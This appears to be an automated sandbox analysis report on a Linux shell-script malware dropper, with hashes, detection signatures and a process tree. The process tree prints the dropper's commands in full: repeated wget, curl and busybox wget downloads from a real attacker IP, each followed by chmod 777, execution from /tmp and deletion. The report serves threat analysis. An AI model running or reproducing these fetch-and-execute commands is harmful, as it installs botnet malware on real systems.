Analysis
-
max time kernel
9s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
-
Size
10KB
-
MD5
60c5521dc77c48a75842ba0dbc3fae7c
-
SHA1
9ddfd137b35be8207eb3889a9a93c23ce142e184
-
SHA256
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490
-
SHA512
da9d12e38093b4ed8181f08e6e568d784d062e018ee58f085668c97a33254dcbf2a1dbe9b2ac4098817bfa045b661fb905ef37999c6fe3019ca1e504eb192d6c
-
SSDEEP
192:jorwWDEg9skLEcnrq/7DlhMYDgAiSEg9sk+zjnrq/7DPMYDgAiA:juwWpEt9EdKKA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1549 chmod 1579 chmod 1597 chmod 1621 chmod 1651 chmod 1513 chmod 1519 chmod 1537 chmod 1591 chmod 1609 chmod 1633 chmod 1663 chmod 1543 chmod 1585 chmod 1603 chmod 1639 chmod 1645 chmod 1657 chmod 1525 chmod 1561 chmod 1615 chmod 1531 chmod 1555 chmod 1573 chmod 1627 chmod 1567 chmod 1669 chmod 1675 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 1514 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 1520 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 1526 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 1532 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 1538 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 1544 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 1550 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 1556 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 1562 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 1568 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 1574 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 1580 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 1586 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 1592 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 1598 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 1604 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 1610 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 1616 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 1622 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 1628 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 1634 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 1640 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 1646 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 1652 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 1658 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 1664 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 1670 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 1676 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl
Processes
-
/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh1⤵PID:1504
-
/bin/rm/bin/rm bins.sh2⤵PID:1505
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1506
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1512
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1518
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1524
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1530
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1536
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1542
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1548
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1554
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1560
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1566
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1569
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1572
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1578
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1584
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1590
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1596
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1602
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:1604
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:1605
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1608
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1614
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1620
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1626
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:1628
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1632
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:1633
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:1634
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:1635
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1636
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1638
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:1639
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:1640
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:1641
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1642
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Writes file to tmp directory
PID:1643
-
-
